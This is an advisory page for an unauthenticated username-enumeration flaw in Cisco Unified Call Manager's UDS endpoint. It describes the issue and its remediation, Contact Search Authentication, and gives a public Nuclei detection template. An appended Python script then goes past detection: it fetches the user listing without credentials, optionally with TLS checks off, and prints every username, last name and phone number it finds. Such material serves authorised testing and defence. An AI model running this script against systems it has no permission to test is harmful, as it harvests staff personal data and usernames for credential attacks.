cucm-username-enumeration: Cisco Unified Call Manager Username Enumeration

Date: 2025-08-01 | Affected software: Cisco Unified Call Manager | PoC: public

Vulnerability Description

Cisco Unified Call Manager (CUCM) exposes its User Data Service (UDS) API at /cucm-uds/users. On affected deployments this endpoint answers requests that carry no credentials with an XML listing of user records (userName, lastName, phoneNumber), so anyone who can reach the CUCM web interface can enumerate valid directory usernames and reuse them for credential attacks against the same or federated systems. Cisco's mitigation is to enable Contact Search Authentication, after which the UDS endpoint requires authentication before returning user data (see the reference below).

PoC Code [public]

id: cucm-username-enumeration

info:
  name: Cisco Unified Call Manager Username Enumeration
  author: manasmbellani
  severity: medium
  description: Cisco Unified Call Manager is vulnerable to username enumeration.
  remediation: To mitigate this, enable Contact Search Authentication.
  reference:
    - https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/
  metadata:
    max-request: 1
  tags: cisco,cucm,unauth,enum,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cucm-uds/users"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<userName>'
          - '<lastName>'
          - '<phoneNumber>'
        condition: and

      - type: dsl
        dsl:
          - contains(tolower(content_type), 'application/xml')
          - contains(tolower(content_type), 'text/xml')
        condition: or
# digest: 4a0a0047304502210092e1feee11a035214f821e5197307dcb334fb5ea625e6d2bf199770aba5514d6022062a94b24ac092c9079699928f2c08cde1899b002a2e8810040101a64ae3ea3ee:922c64590222798bb761d5b6d8e72950
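The following Python script is an added example and is not part of the page or of the Nuclei template above; it reproduces the template's three checks (HTTP 200, an XML content type, and the userName/lastName/phoneNumber elements) without Nuclei and then parses the UDS response into usernames. The hostname cucm.example.internal and the sample XML body are constructed for the example, not captured from a real system; the --insecure flag and the function names are the example's own.

```python
"""Check a CUCM host for unauthenticated UDS user listing and extract usernames (added example)."""
import ssl
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET  # prefer defusedxml for hostile input; stdlib used here to stay self-contained

UDS_USERS_PATH = "/cucm-uds/users"          # the endpoint the template requests
REQUIRED_TAGS = ("userName", "lastName", "phoneNumber")  # the template's word matchers

# Constructed sample body shaped like a UDS user listing (hostname and users are made up).
SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<users uri="https://cucm.example.internal/cucm-uds/users" totalCount="2" start="0" resultCount="2">
  <user uri="https://cucm.example.internal/cucm-uds/users/1">
    <id>1</id>
    <userName>jdoe</userName>
    <firstName>Jane</firstName>
    <lastName>Doe</lastName>
    <phoneNumber>1001</phoneNumber>
  </user>
  <user uri="https://cucm.example.internal/cucm-uds/users/2">
    <id>2</id>
    <userName>asmith</userName>
    <firstName>Alex</firstName>
    <lastName>Smith</lastName>
    <phoneNumber>1002</phoneNumber>
  </user>
</users>
"""

# Constructed body a hardened host might return instead of the listing.
SAMPLE_HTML = b"<html><body><h1>Authentication required</h1></body></html>"


def is_uds_user_listing(status, content_type, body):
    """Mirror the template's matchers-condition: status 200 AND XML content type AND all three tags."""
    if status != 200:
        return False
    ct = (content_type or "").lower()
    if "application/xml" not in ct and "text/xml" not in ct:
        return False
    text = body.decode("utf-8", errors="replace")
    return all(f"<{tag}>" in text for tag in REQUIRED_TAGS)


def parse_uds_users(body):
    """Return a list of {userName, lastName, phoneNumber} dicts from a UDS <users> document.

    Assumes the UDS XML uses no default namespace (element tags are plain "user", "userName", ...).
    """
    root = ET.fromstring(body)
    users = []
    for user in root.iter("user"):
        record = {}
        for tag in REQUIRED_TAGS:
            el = user.find(tag)
            record[tag] = (el.text or "").strip() if el is not None else ""
        users.append(record)
    return users


def fetch_uds_users(base_url, timeout=10, verify_tls=True):
    """GET base_url + /cucm-uds/users with no credentials; return (status, content_type, body)."""
    url = base_url.rstrip("/") + UDS_USERS_PATH
    ctx = ssl.create_default_context()
    if not verify_tls:  # CUCM deployments frequently use self-signed certificates
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"Accept": "application/xml"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read()
    except urllib.error.HTTPError as err:  # 401/403 etc. still carry useful headers and body
        return err.code, err.headers.get("Content-Type", ""), err.read()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} https://cucm-host [--insecure]")
    status, ctype, body = fetch_uds_users(sys.argv[1], verify_tls="--insecure" not in sys.argv[2:])
    if is_uds_user_listing(status, ctype, body):
        for u in parse_uds_users(body):
            print(f"{u['userName']}\t{u['lastName']}\t{u['phoneNumber']}")
    else:
        print(f"not vulnerable or filtered: HTTP {status}, Content-Type {ctype!r}")
```

A host that has Contact Search Authentication enabled will normally answer with a non-200 status or a non-XML body, which the first two checks reject before any parsing happens; keep that order when adapting the script so an unexpected HTML error page is never fed to the XML parser.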
